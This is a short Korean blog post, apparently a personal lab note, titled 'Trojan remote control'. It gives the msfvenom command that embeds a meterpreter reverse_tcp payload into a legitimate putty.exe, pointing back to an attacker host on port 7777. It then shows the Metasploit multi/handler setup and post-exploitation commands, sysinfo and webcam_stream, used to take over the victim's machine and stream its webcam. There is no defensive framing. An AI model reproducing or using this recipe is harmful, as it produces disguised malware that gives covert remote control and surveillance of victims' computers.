기타...

트로이 목마 원격 제어

Roronoa 2023. 3. 27. 01:19
반응형

[그림 1] putty.exe 다운

악성코드를 심을 대상인 putty.exe 64비트를 다운 받았다.

 

[그림 2] 악성코드 주입

악성코드 주입 명령어

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.60.137 lport=7777 -x putty.exe -k -f exe -o meterpreter_putty.exe

 

[그림 3] msfconsole 실행

msfconsole을 실행한다.

 

[그림 4] options 설정

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 공격자 IP
set lport 열고싶은 포트
exploit

[그림 5] 대상 컴퓨터에서 악성코드 실행

악성코드를 실행하니 공격자가 대상 컴퓨터를 장악하였다.

 

[그림 6] sysinfo

sysinfo 명령어로 대상 컴퓨터에 대한 정보를 알아내었다.

 

[그림 7] webcam_stream

webcam_stream 명령어로 대상 컴퓨터의 웹캠을 실시간으로 스트리밍 가능하다.

 

참고 사이트

https://www.hackers-arise.com/post/2018/10/16/metasploit-basics-part-15-post-exploitation-fun-web-cam-microphone-passwords-and-more

반응형

'기타...' 카테고리의 다른 글

해킹 tool 사이트  (0) 2023.03.22